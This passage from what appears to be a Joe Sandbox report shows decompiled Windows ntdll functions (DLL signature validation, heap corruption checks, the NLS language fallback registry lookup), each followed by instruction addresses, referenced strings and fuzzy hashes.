							asm("int3");
						}
						_t124 = 0xc0000428;
						goto L8;
					}
					L5:
					if(( *(_t125 + 0x34) & 0x01000000) != 0) {
						goto L8;
					}
					_t77 = _a4 - 0x40000003;
					if(_t77 == 0 || _t77 == 0x33) {
						_v16 =  *((intOrPtr*)(_t125 + 0x18));
						if(E01687D50() != 0) {
							_t82 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
						} else {
							_t82 = 0x7ffe0384;
						}
						_t108 = 0x7ffe0385;
						if( *_t82 != 0) {
							if(( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
								if(E01687D50() == 0) {
									_t97 = 0x7ffe0385;
								} else {
									_t97 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								}
								if(( *_t97 & 0x00000020) != 0) {
									E016E7016(0x1490, _v16, 0xffffffff, 0xffffffff, 0, 0);
								}
							}
						}
						if(_a4 != 0x40000003) {
							L14:
							_t126 =  *((intOrPtr*)(_t125 + 0x18));
							if(E01687D50() != 0) {
								_t87 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
							} else {
								_t87 = 0x7ffe0384;
							}
							if( *_t87 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
								if(E01687D50() != 0) {
									_t108 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								}
								if(( *_t108 & 0x00000020) != 0) {
									E016E7016(0x1491, _t126, 0xffffffff, 0xffffffff, 0, 0);
								}
							}
							goto L8;
						} else {
							_v16 = _t125 + 0x24;
							_t124 = E0169A1C3( *((intOrPtr*)(_t125 + 0x18)),  *((intOrPtr*)(_v12 + 0x5c)), _v20, _t125 + 0x24);
							if(_t124 < 0) {
								E0166B1E1(_t124, 0x1490, 0, _v16);
								goto L8;
							}
							goto L14;
						}
					} else {
						goto L8;
					}
				}
			}




















                    0x01677e4c
                    0x01677e50
                    0x01677e55
                    0x01677e58
                    0x01677e5d
                    0x01677e71
                    0x01677f33
                    0x01677e77
                    0x01677e77
                    0x01677e79
                    0x01677e79
                    0x01677e7e
                    0x01677f45
                    0x016c9848
                    0x00000000
                    0x016c9848
                    0x01677f4e
                    0x01677f53
                    0x01677f5a
                    0x00000000
                    0x00000000
                    0x016c985a
                    0x016c9862
                    0x016c9866
                    0x00000000
                    0x016c986c
                    0x00000000
                    0x016c986c
                    0x01677e84
                    0x01677e84
                    0x01677e8d
                    0x016c9871
                    0x01677eb8
                    0x01677ec0
                    0x01677ec0
                    0x01677e9a
                    0x016c987e
                    0x00000000
                    0x00000000
                    0x016c9884
                    0x016c988b
                    0x016c98a7
                    0x016c98ac
                    0x016c98b1
                    0x016c98b6
                    0x016c98b8
                    0x016c98b8
                    0x016c98b9
                    0x00000000
                    0x016c98b9
                    0x01677ea0
                    0x01677ea7
                    0x00000000
                    0x00000000
                    0x01677eac
                    0x01677eb1
                    0x01677ec6
                    0x01677ed0
                    0x016c98cc
                    0x01677ed6
                    0x01677ed6
                    0x01677ed6
                    0x01677ede
                    0x01677ee3
                    0x016c98e3
                    0x016c98f0
                    0x016c9902
                    0x016c98f2
                    0x016c98fb
                    0x016c98fb
                    0x016c9907
                    0x016c991d
                    0x016c991d
                    0x016c9907
                    0x016c98e3
                    0x01677ef0
                    0x01677f14
                    0x01677f14
                    0x01677f1e
                    0x016c9946
                    0x01677f24
                    0x01677f24
                    0x01677f24
                    0x01677f2c
                    0x016c996a
                    0x016c9975
                    0x016c9975
                    0x016c997e
                    0x016c9993
                    0x016c9993
                    0x016c997e
                    0x00000000
                    0x01677ef2
                    0x01677efc
                    0x01677f0a
                    0x01677f0e
                    0x016c9933
                    0x00000000
                    0x016c9933
                    0x00000000
                    0x01677f0e
                    0x00000000
                    0x00000000
                    0x00000000
                    0x01677eb1

                    Strings
                    • minkernel\ntdll\ldrmap.c, xrefs: 016C98A2
                    • Could not validate the crypto signature for DLL %wZ, xrefs: 016C9891
                    • LdrpCompleteMapModule, xrefs: 016C9898
                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
                    • API String ID: 0-1676968949
                    • Opcode ID: 849ab64c9e0f9489f37516842b599538e4ac0edb225c6f3c3dc41b75d82857bf
                    • Instruction ID: 8b4aafd2c044558190fcff06a87845b8aeebda41caf3621d7071cac5f9f82f90
                    • Opcode Fuzzy Hash: 849ab64c9e0f9489f37516842b599538e4ac0edb225c6f3c3dc41b75d82857bf
                    • Instruction Fuzzy Hash: 7751EF31600746DBEB22CB6CCD48B7A7BE5EB00718F140AADE9519B7E2D774E901CB91
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 017123E3 Relevance: 3.9, Strings: 3, Instructions: 166COMMONCrypto
                    Download Yara Rule
                    C-Code - Quality: 64%
                    			E017123E3(signed int __ecx, unsigned int __edx) {
				intOrPtr _v8;
				intOrPtr _t42;
				char _t43;
				signed short _t44;
				signed short _t48;
				signed char _t51;
				signed short _t52;
				intOrPtr _t54;
				signed short _t64;
				signed short _t66;
				intOrPtr _t69;
				signed short _t73;
				signed short _t76;
				signed short _t77;
				signed short _t79;
				void* _t83;
				signed int _t84;
				signed int _t85;
				signed char _t94;
				unsigned int _t99;
				unsigned int _t104;
				signed int _t108;
				void* _t110;
				void* _t111;
				unsigned int _t114;

				_t84 = __ecx;
				_push(__ecx);
				_t114 = __edx;
				_t42 =  *((intOrPtr*)(__edx + 7));
				if(_t42 == 1) {
					L49:
					_t43 = 1;
					L50:
					return _t43;
				}
				if(_t42 != 4) {
					if(_t42 >= 0) {
						if( *(__ecx + 0x4c) == 0) {
							_t44 =  *__edx & 0x0000ffff;
						} else {
							_t73 =  *__edx;
							if(( *(__ecx + 0x4c) & _t73) != 0) {
								_t73 = _t73 ^  *(__ecx + 0x50);
							}
							_t44 = _t73 & 0x0000ffff;
						}
					} else {
						_t104 = __edx >> 0x00000003 ^  *__edx ^  *0x175874c ^ __ecx;
						if(_t104 == 0) {
							_t76 =  *((intOrPtr*)(__edx - (_t104 >> 0xd)));
						} else {
							_t76 = 0;
						}
						_t44 =  *((intOrPtr*)(_t76 + 0x14));
					}
					_t94 =  *((intOrPtr*)(_t114 + 7));
					_t108 = _t44 & 0xffff;
					if(_t94 != 5) {
						if((_t94 & 0x00000040) == 0) {
							if((_t94 & 0x0000003f) == 0x3f) {
								if(_t94 >= 0) {
									if( *(_t84 + 0x4c) == 0) {
										_t48 =  *_t114 & 0x0000ffff;
									} else {
										_t66 =  *_t114;
										if(( *(_t84 + 0x4c) & _t66) != 0) {
											_t66 = _t66 ^  *(_t84 + 0x50);
										}
										_t48 = _t66 & 0x0000ffff;
									}
								} else {
									_t99 = _t114 >> 0x00000003 ^  *_t114 ^  *0x175874c ^ _t84;
									if(_t99 == 0) {
										_t69 =  *((intOrPtr*)(_t114 - (_t99 >> 0xd)));
									} else {
										_t69 = 0;
									}
									_t48 =  *((intOrPtr*)(_t69 + 0x14));
								}
								_t85 =  *(_t114 + (_t48 & 0xffff) * 8 - 4);
							} else {
								_t85 = _t94 & 0x3f;
							}
						} else {
							_t85 =  *(_t114 + 4 + (_t94 & 0x3f) * 8) & 0x0000ffff;
						}
					} else {
						_t85 =  *(_t84 + 0x54) & 0x0000ffff ^  *(_t114 + 4) & 0x0000ffff;
					}
					_t110 = (_t108 << 3) - _t85;
				} else {
					if( *(__ecx + 0x4c) == 0) {
						_t77 =  *__edx & 0x0000ffff;
					} else {
						_t79 =  *__edx;
						if(( *(__ecx + 0x4c) & _t79) != 0) {
							_t79 = _t79 ^  *(__ecx + 0x50);
						}
						_t77 = _t79 & 0x0000ffff;
					}
					_t110 =  *((intOrPtr*)(_t114 - 8)) - (_t77 & 0x0000ffff);
				}
				_t51 =  *((intOrPtr*)(_t114 + 7));
				if(_t51 != 5) {
					if((_t51 & 0x00000040) == 0) {
						_t52 = 0;
						goto L42;
					}
					_t64 = _t51 & 0x3f;
					goto L38;
				} else {
					_t64 =  *(_t114 + 6) & 0x000000ff;
					L38:
					_t52 = _t64 << 0x00000003 & 0x0000ffff;
					L42:
					_t35 = _t114 + 8; // -16
					_t111 = _t110 + (_t52 & 0x0000ffff);
					_t83 = _t35 + _t111;
					_t54 = E016BD4F0(_t83, 0x1646c58, 8);
					_v8 = _t54;
					if(_t54 == 8) {
						goto L49;
					}
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push("HEAP: ");
						E0166B150();
					} else {
						E0166B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push(_t111);
					_push(_v8 + _t83);
					E0166B150("Heap block at %p modified at %p past requested size of %Ix\n", _t114);
					if( *((char*)( *[fs:0x30] + 2)) != 0) {
						 *0x1756378 = 1;
						asm("int3");
						 *0x1756378 = 0;
					}
					_t43 = 0;
					goto L50;
				}
			}




























                    0x017123e3
                    0x017123e8
                    0x017123eb
                    0x017123ee
                    0x017123f3
                    0x0171259b
                    0x0171259b
                    0x0171259d
                    0x017125a3
                    0x017125a3
                    0x017123fb
                    0x01712424
                    0x0171244f
                    0x01712460
                    0x01712451
                    0x01712451
                    0x01712456
                    0x01712458
                    0x01712458
                    0x0171245b
                    0x0171245b
                    0x01712426
                    0x01712431
                    0x01712436
                    0x01712443
                    0x01712438
                    0x01712438
                    0x01712438
                    0x01712445
                    0x01712445
                    0x01712463
                    0x01712469
                    0x0171246f
                    0x01712480
                    0x01712495
                    0x017124a1
                    0x017124ce
                    0x017124df
                    0x017124d0
                    0x017124d0
                    0x017124d5
                    0x017124d7
                    0x017124d7
                    0x017124da
                    0x017124da
                    0x017124a3
                    0x017124b0
                    0x017124b5
                    0x017124c2
                    0x017124b7
                    0x017124b7
                    0x017124b7
                    0x017124c4
                    0x017124c4
                    0x017124e8
                    0x01712497
                    0x0171249a
                    0x0171249a
                    0x01712482
                    0x01712488
                    0x01712488
                    0x01712471
                    0x01712479
                    0x01712479
                    0x017124ef
                    0x017123fd
                    0x01712401
                    0x01712412
                    0x01712403
                    0x01712403
                    0x01712408
                    0x0171240a
                    0x0171240a
                    0x0171240d
                    0x0171240d
                    0x0171241b
                    0x0171241b
                    0x017124f1
                    0x017124f6
                    0x01712507
                    0x01712510
                    0x00000000
                    0x01712510
                    0x0171250b
                    0x00000000
                    0x017124f8
                    0x017124f8
                    0x017124fc
                    0x01712500
                    0x01712512
                    0x01712515
                    0x0171251a
                    0x01712521
                    0x01712524
                    0x01712529
                    0x0171252f
                    0x00000000
                    0x00000000
                    0x0171253c
                    0x0171255c
                    0x01712561
                    0x0171253e
                    0x01712554
                    0x01712559
                    0x0171256a
                    0x0171256d
                    0x01712574
                    0x01712586
                    0x01712588
                    0x0171258f
                    0x01712590
                    0x01712590
                    0x01712597
                    0x00000000
                    0x01712597

                    Strings
                    • HEAP: , xrefs: 0171255C
                    • Heap block at %p modified at %p past requested size of %Ix, xrefs: 0171256F
                    • HEAP[%wZ]: , xrefs: 0171254F
                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID: HEAP: $HEAP[%wZ]: $Heap block at %p modified at %p past requested size of %Ix
                    • API String ID: 0-3815128232
                    • Opcode ID: 6e1dfa925fd54fe25675e81d637334ed694d96e5bcaa8bbab86f68893cf58673
                    • Instruction ID: b4adc71275abc230cc0874de2b01c03adc265ea7a14513849d8247431776d8b2
                    • Opcode Fuzzy Hash: 6e1dfa925fd54fe25675e81d637334ed694d96e5bcaa8bbab86f68893cf58673
                    • Instruction Fuzzy Hash: C15116742402509AE774CE1EC884772FBF1DB48645F74889DEDC28B28BD279DC46DB60
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0166E620 Relevance: 3.9, Strings: 3, Instructions: 165COMMON
                    Download Yara Rule
                    C-Code - Quality: 93%
                    			E0166E620(void* __ecx, short* __edx, short* _a4) {
				char _v16;
				char _v20;
				intOrPtr _v24;
				char* _v28;
				char _v32;
				char _v36;
				char _v44;
				signed int _v48;
				intOrPtr _v52;
				void* _v56;
				void* _v60;
				char _v64;
				void* _v68;
				void* _v76;
				void* _v84;
				signed int _t59;
				signed int _t74;
				signed short* _t75;
				signed int _t76;
				signed short* _t78;
				signed int _t83;
				short* _t93;
				signed short* _t94;
				short* _t96;
				void* _t97;
				signed int _t99;
				void* _t101;
				void* _t102;

				_t80 = __ecx;
				_t101 = (_t99 & 0xfffffff8) - 0x34;
				_t96 = __edx;
				_v44 = __edx;
				_t78 = 0;
				_v56 = 0;
				if(__ecx == 0 || __edx == 0) {
					L28:
					_t97 = 0xc000000d;
				} else {
					_t93 = _a4;
					if(_t93 == 0) {
						goto L28;
					}
					_t78 = E0166F358(__ecx, 0xac);
					if(_t78 == 0) {
						_t97 = 0xc0000017;
						L6:
						if(_v56 != 0) {
							_push(_v56);
							E016A95D0();
						}
						if(_t78 != 0) {
							L016877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t78);
						}
						return _t97;
					}
					E016AFA60(_t78, 0, 0x158);
					_v48 = _v48 & 0x00000000;
					_t102 = _t101 + 0xc;
					 *_t96 = 0;
					 *_t93 = 0;
					E016ABB40(_t80,  &_v36, L"\\Registry\\Machine\\System\\CurrentControlSet\\Control\\NLS\\Language");
					_v36 = 0x18;
					_v28 =  &_v44;
					_v64 = 0;
					_push( &_v36);
					_push(0x20019);
					_v32 = 0;
					_push( &_v64);
					_v24 = 0x40;
					_v20 = 0;
					_v16 = 0;
					_t97 = E016A9600();
					if(_t97 < 0) {
						goto L6;
					}
					E016ABB40(0,  &_v36, L"InstallLanguageFallback");
					_push(0);
					_v48 = 4;
					_t97 = L0166F018(_v64,  &_v44,  &_v56, _t78,  &_v48);
					if(_t97 >= 0) {
						if(_v52 != 1) {
							L17:
							_t97 = 0xc0000001;
							goto L6;
						}
						_t59 =  *_t78 & 0x0000ffff;
						_t94 = _t78;
						_t83 = _t59;
						if(_t59 == 0) {
							L19:
							if(_t83 == 0) {
								L23:
								E016ABB40(_t83, _t102 + 0x24, _t78);
								if(L016743C0( &_v48,  &_v64) == 0) {
									goto L17;
								}
								_t84 = _v48;
								 *_v48 = _v56;
								if( *_t94 != 0) {
									E016ABB40(_t84, _t102 + 0x24, _t94);
									if(L016743C0( &_v48,  &_v64) != 0) {
										 *_a4 = _v56;
									} else {
										_t97 = 0xc0000001;
										 *_v48 = 0;
									}
								}
								goto L6;
							}
							_t83 = _t83 & 0x0000ffff;
							while(_t83 == 0x20) {
								_t94 =  &(_t94[1]);
								_t74 =  *_t94 & 0x0000ffff;
								_t83 = _t74;
								if(_t74 != 0) {
									continue;
								}
								goto L23;
							}
							goto L23;
						} else {
							goto L14;
						}
						while(1) {
							L14:
							_t27 =  &(_t94[1]); // 0x2
							_t75 = _t27;
							if(_t83 == 0x2c) {
								break;
							}
							_t94 = _t75;
							_t76 =  *_t94 & 0x0000ffff;
							_t83 = _t76;
							if(_t76 != 0) {
								continue;
							}
							goto L23;
						}
						 *_t94 = 0;
						_t94 = _t75;
						_t83 =  *_t75 & 0x0000ffff;
						goto L19;
					}
				}
			}































                    0x0166e620
                    0x0166e628
                    0x0166e62f
                    0x0166e631
                    0x0166e635
                    0x0166e637
                    0x0166e63e
                    0x016c5503
                    0x016c5503
                    0x0166e64c
                    0x0166e64c
                    0x0166e651
                    0x00000000
                    0x00000000
                    0x0166e661
                    0x0166e665
                    0x016c542a
                    0x0166e715
                    0x0166e71a
                    0x0166e71c
                    0x0166e720
                    0x0166e720
                    0x0166e727
                    0x0166e736
                    0x0166e736
                    0x0166e743
                    0x0166e743
                    0x0166e673
                    0x0166e678
                    0x0166e67d
                    0x0166e682
                    0x0166e685
                    0x0166e692
                    0x0166e69b
                    0x0166e6a3
                    0x0166e6ad
                    0x0166e6b1
                    0x0166e6b2
                    0x0166e6bb
                    0x0166e6bf
                    0x0166e6c0
                    0x0166e6c8
                    0x0166e6cc
                    0x0166e6d5
                    0x0166e6d9
                    0x00000000
                    0x00000000
                    0x0166e6e5
                    0x0166e6ea
                    0x0166e6f9
                    0x0166e70b
                    0x0166e70f
                    0x016c5439
                    0x016c545e
                    0x016c545e
                    0x00000000
                    0x016c545e
                    0x016c543b
                    0x016c543e
                    0x016c5440
                    0x016c5445
                    0x016c5472
                    0x016c5475
                    0x016c548d
                    0x016c5493
                    0x016c54a9
                    0x00000000
                    0x00000000
                    0x016c54ab
                    0x016c54b4
                    0x016c54bc
                    0x016c54c8
                    0x016c54de
                    0x016c54fb
                    0x016c54e0
                    0x016c54e6
                    0x016c54eb
                    0x016c54eb
                    0x016c54de
                    0x00000000
                    0x016c54bc
                    0x016c5477
                    0x016c547a
                    0x016c5480
                    0x016c5483
                    0x016c5486
                    0x016c548b
                    0x00000000
                    0x00000000
                    0x00000000
                    0x016c548b
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x016c5447
                    0x016c5447
                    0x016c5447
                    0x016c5447
                    0x016c544e
                    0x00000000
                    0x00000000
                    0x016c5450
                    0x016c5452
                    0x016c5455
                    0x016c545a
                    0x00000000
                    0x00000000
                    0x00000000
                    0x016c545c
                    0x016c546a
                    0x016c546d
                    0x016c546f
                    0x00000000
                    0x016c546f
                    0x0166e70f

                    Strings
                    • \Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 0166E68C
                    • InstallLanguageFallback, xrefs: 0166E6DB
                    • @, xrefs: 0166E6C0
                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID: @$InstallLanguageFallback$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
                    • API String ID: 0-1757540487
                    • Opcode ID: 0e1dc23e9700ef60e92d85440082222b80e9b75864dd8e4210b6829c72f9fa88
                    • Instruction ID: 449be4217e42240c471a3072ecfb0c1657be89ccdac4abdf49e6b53f7b7b7b08
                    • Opcode Fuzzy Hash: 0e1dc23e9700ef60e92d85440082222b80e9b75864dd8e4210b6829c72f9fa88
                    • Instruction Fuzzy Hash: 5151B1766093469BD710DF68CC50ABBB7E9EF88714F44492EF986D7240EB34D904C792
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0168B8E4 Relevance: 3.8, Strings: 3, Instructions: 69COMMON
                    Download Yara Rule
                    C-Code - Quality: 60%
                    			E0168B8E4(unsigned int __edx) {
				void* __ecx;
				void* __edi;
				intOrPtr* _t16;
				intOrPtr _t18;
				void* _t27;
				void* _t28;
				unsigned int _t30;
				intOrPtr* _t31;
				unsigned int _t38;
				void* _t39;
				unsigned int _t40;

				_t40 = __edx;
				_t39 = _t28;
				if( *0x1758748 >= 1) {
					__eflags = (__edx + 0x00000fff & 0xfffff000) - __edx;
					if((__edx + 0x00000fff & 0xfffff000) != __edx) {
						_t18 =  *[fs:0x30];
						__eflags =  *(_t18 + 0xc);
						if( *(_t18 + 0xc) == 0) {
							_push("HEAP: ");
							E0166B150();
						} else {
							E0166B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
						}
						_push("(ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)");
						E0166B150();
						__eflags =  *0x1757bc8;
						if(__eflags == 0) {
							E01722073(_t27, 1, _t39, __eflags);
						}
					}
				}
				_t38 =  *(_t39 + 0xb8);
				if(_t38 != 0) {
					_t13 = _t40 >> 0xc;
					__eflags = _t13;
					while(1) {
						__eflags = _t13 -  *((intOrPtr*)(_t38 + 4));
						if(_t13 <  *((intOrPtr*)(_t38 + 4))) {
							break;
						}
						_t30 =  *_t38;
						__eflags = _t30;
						if(_t30 != 0) {
							_t38 = _t30;
							continue;
						}
						_t13 =  *((intOrPtr*)(_t38 + 4)) - 1;
						__eflags =  *((intOrPtr*)(_t38 + 4)) - 1;
						break;
					}
					return E0168AB40(_t39, _t38, 0, _t13, _t40);
				} else {
					_t31 = _t39 + 0x8c;
					_t16 =  *_t31;
					while(_t31 != _t16) {
						__eflags =  *((intOrPtr*)(_t16 + 0x14)) - _t40;
						if( *((intOrPtr*)(_t16 + 0x14)) >= _t40) {
							return _t16;
						}
						_t16 =  *_t16;
					}
					return _t31;
				}
			}














                    0x0168b8f0
                    0x0168b8f2
                    0x0168b8f4
                    0x016d2c4e
                    0x016d2c50
                    0x016d2c56
                    0x016d2c5c
                    0x016d2c60
                    0x016d2c7f
                    0x016d2c84
                    0x016d2c62
                    0x016d2c77
                    0x016d2c7c
                    0x016d2c8a
                    0x016d2c8f
                    0x016d2c94
                    0x016d2c9c
                    0x016d2ca5
                    0x016d2ca5
                    0x016d2c9c
                    0x016d2c50
                    0x0168b8fa
                    0x0168b902
                    0x0168b921
                    0x0168b921
                    0x0168b924
                    0x0168b924
                    0x0168b927
                    0x00000000
                    0x00000000
                    0x0168b929
                    0x0168b92b
                    0x0168b92d
                    0x0168b940
                    0x00000000
                    0x0168b940
                    0x0168b932
                    0x0168b932
                    0x00000000
                    0x0168b932
                    0x00000000
                    0x0168b904
                    0x0168b904
                    0x0168b90a
                    0x0168b90c
                    0x0168b916
                    0x0168b919
                    0x0168b915
                    0x0168b915
                    0x0168b91b
                    0x0168b91b
                    0x00000000
                    0x0168b910

                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                    • API String ID: 0-2558761708
                    • Opcode ID: e4c76f368c0f509e97980d2bc74193fe736ce86796b9517665bb2fdb97540d34
                    • Instruction ID: 366f5c1777c38df47730d7a432d8dfed07a14d4daef4daee678106b8386f327d
                    • Opcode Fuzzy Hash: e4c76f368c0f509e97980d2bc74193fe736ce86796b9517665bb2fdb97540d34
                    • Instruction Fuzzy Hash: A111E231714602DFDB29EB19CC94B3AB7AAEF41621F19826DE40ACB351E774D881C749
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0172E539 Relevance: 2.8, Strings: 2, Instructions: 261COMMON
                    Download Yara Rule
                    C-Code - Quality: 60%
                    			E0172E539(unsigned int* __ecx, intOrPtr __edx, signed int _a4, signed int _a8) {
				signed int _v20;
				char _v24;
				signed int _v40;
				char _v44;
				intOrPtr _v48;
				signed int _v52;
				unsigned int _v56;
				char _v60;
				signed int _v64;
				char _v68;
				signed int _v72;
				void* __ebx;
				void* __edi;
				char _t87;
				signed int _t90;
				signed int _t94;
				signed int _t100;
				intOrPtr* _t113;
				signed int _t122;
				void* _t132;
				void* _t135;
				signed int _t139;
				signed int* _t141;
				signed int _t146;
				signed int _t147;
				void* _t153;
				signed int _t155;
				signed int _t159;
				char _t166;
				void* _t172;
				void* _t176;
				signed int _t177;
				intOrPtr* _t179;

				_t179 = __ecx;
				_v48 = __edx;
				_v68 = 0;
				_v72 = 0;
				_push(__ecx[1]);
				_push( *__ecx);
				_push(0);
				_t153 = 0x14;
				_t135 = _t153;
				_t132 = E0172BBBB(_t135, _t153);
				if(_t132 == 0) {
					_t166 = _v68;
					goto L43;
				} else {
					_t155 = 0;
					_v52 = 0;
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					_v56 = __ecx[1];
					if( *__ecx >> 8 < 2) {
						_t155 = 1;
						_v52 = 1;
					}
					_t139 = _a4;
					_t87 = (_t155 << 0xc) + _t139;
					_v60 = _t87;
					if(_t87 < _t139) {
						L11:
						_t166 = _v68;
						L12:
						if(_t132 != 0) {
							E0172BCD2(_t132,  *_t179,  *((intOrPtr*)(_t179 + 4)));
						}
						L43:
						if(_v72 != 0) {
							_push( *((intOrPtr*)(_t179 + 4)));
							_push( *_t179);
							_push(0x8000);
							E0172AFDE( &_v72,  &_v60);
						}
						L46:
						return _t166;
					}
					_t90 =  *(_t179 + 0xc) & 0x40000000;
					asm("sbb edi, edi");
					_t172 = ( ~_t90 & 0x0000003c) + 4;
					if(_t90 != 0) {
						_push(0);
						_push(0x14);
						_push( &_v44);
						_push(3);
						_push(_t179);
						_push(0xffffffff);
						if(E016A9730() < 0 || (_v40 & 0x00000060) == 0 || _v44 != _t179) {
							_push(_t139);
							E0172A80D(_t179, 1, _v40, 0);
							_t172 = 4;
						}
					}
					_t141 =  &_v72;
					if(E0172A854(_t141,  &_v60, 0, 0x2000, _t172, _t179,  *_t179,  *((intOrPtr*)(_t179 + 4))) >= 0) {
						_v64 = _a4;
						_t94 =  *(_t179 + 0xc) & 0x40000000;
						asm("sbb edi, edi");
						_t176 = ( ~_t94 & 0x0000003c) + 4;
						if(_t94 != 0) {
							_push(0);
							_push(0x14);
							_push( &_v24);
							_push(3);
							_push(_t179);
							_push(0xffffffff);
							if(E016A9730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t179) {
								_push(_t141);
								E0172A80D(_t179, 1, _v20, 0);
								_t176 = 4;
							}
						}
						if(E0172A854( &_v72,  &_v64, 0, 0x1000, _t176, 0,  *_t179,  *((intOrPtr*)(_t179 + 4))) < 0) {
							goto L11;
						} else {
							_t177 = _v64;
							 *((intOrPtr*)(_t132 + 0xc)) = _v72;
							_t100 = _v52 + _v52;
							_t146 =  *(_t132 + 0x10) & 0x00000ffd | _t177 & 0xfffff000 | _t100;
							 *(_t132 + 0x10) = _t146;
							asm("bsf eax, [esp+0x18]");
							_v52 = _t100;
							 *(_t132 + 0x10) = (_t100 << 0x00000002 ^ _t146) & 0x000000fc ^ _t146;
							 *((short*)(_t132 + 0xc)) = _t177 - _v48;
							_t47 =  &_a8;
							 *_t47 = _a8 & 0x00000001;
							if( *_t47 == 0) {
								E01682280(_t179 + 0x30, _t179 + 0x30);
							}
							_t147 =  *(_t179 + 0x34);
							_t159 =  *(_t179 + 0x38) & 1;
							_v68 = 0;
							if(_t147 == 0) {
								L35:
								E0167B090(_t179 + 0x34, _t147, _v68, _t132);
								if(_a8 == 0) {
									E0167FFB0(_t132, _t177, _t179 + 0x30);
								}
								asm("lock xadd [eax], ecx");
								asm("lock xadd [eax], edx");
								_t132 = 0;
								_v72 = _v72 & 0;
								_v68 = _v72;
								if(E01687D50() == 0) {
									_t113 = 0x7ffe0388;
								} else {
									_t177 = _v64;
									_t113 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
								}
								if( *_t113 == _t132) {
									_t166 = _v68;
									goto L46;
								} else {
									_t166 = _v68;
									E0171FEC0(_t132, _t179, _t166, _t177 + 0x1000);
									goto L12;
								}
							} else {
								L23:
								while(1) {
									if(_v72 < ( *(_t147 + 0xc) & 0xffff0000)) {
										_t122 =  *_t147;
										if(_t159 == 0) {
											L32:
											if(_t122 == 0) {
												L34:
												_v68 = 0;
												goto L35;
											}
											L33:
											_t147 = _t122;
											continue;
										}
										if(_t122 == 0) {
											goto L34;
										}
										_t122 = _t122 ^ _t147;
										goto L32;
									}
									_t122 =  *(_t147 + 4);
									if(_t159 == 0) {
										L27:
										if(_t122 != 0) {
											goto L33;
										}
										L28:
										_v68 = 1;
										goto L35;
									}
									if(_t122 == 0) {
										goto L28;
									}
									_t122 = _t122 ^ _t147;
									goto L27;
								}
							}
						}
					}
					_v72 = _v72 & 0x00000000;
					goto L11;
				}
			}




































                    0x0172e547
                    0x0172e549
                    0x0172e54f
                    0x0172e553
                    0x0172e557
                    0x0172e55a
                    0x0172e55c
                    0x0172e55f
                    0x0172e561
                    0x0172e567
                    0x0172e56b
                    0x0172e7e2
                    0x00000000
                    0x0172e571
                    0x0172e575
                    0x0172e577
                    0x0172e57b
                    0x0172e57c
                    0x0172e57d
                    0x0172e57e
                    0x0172e57f
                    0x0172e588
                    0x0172e58f
                    0x0172e591
                    0x0172e592
                    0x0172e592
                    0x0172e596
                    0x0172e59e
                    0x0172e5a0
                    0x0172e5a6
                    0x0172e61d
                    0x0172e61d
                    0x0172e621
                    0x0172e623
                    0x0172e630
                    0x0172e630
                    0x0172e7e6
                    0x0172e7eb
                    0x0172e7ed
                    0x0172e7f4
                    0x0172e7fa
                    0x0172e7ff
                    0x0172e7ff
                    0x0172e80a
                    0x0172e812
                    0x0172e812
                    0x0172e5ab
                    0x0172e5b4
                    0x0172e5b9
                    0x0172e5be
                    0x0172e5c0
                    0x0172e5c2
                    0x0172e5c8
                    0x0172e5c9
                    0x0172e5cb
                    0x0172e5cc
                    0x0172e5d5
                    0x0172e5e4
                    0x0172e5f1
                    0x0172e5f8
                    0x0172e5f8
                    0x0172e5d5
                    0x0172e602
                    0x0172e616
                    0x0172e63d
                    0x0172e644
                    0x0172e64d
                    0x0172e652
                    0x0172e657
                    0x0172e659
                    0x0172e65b
                    0x0172e661
                    0x0172e662
                    0x0172e664
                    0x0172e665
                    0x0172e66e
                    0x0172e67d
                    0x0172e68a
                    0x0172e691
                    0x0172e691
                    0x0172e66e
                    0x0172e6b0
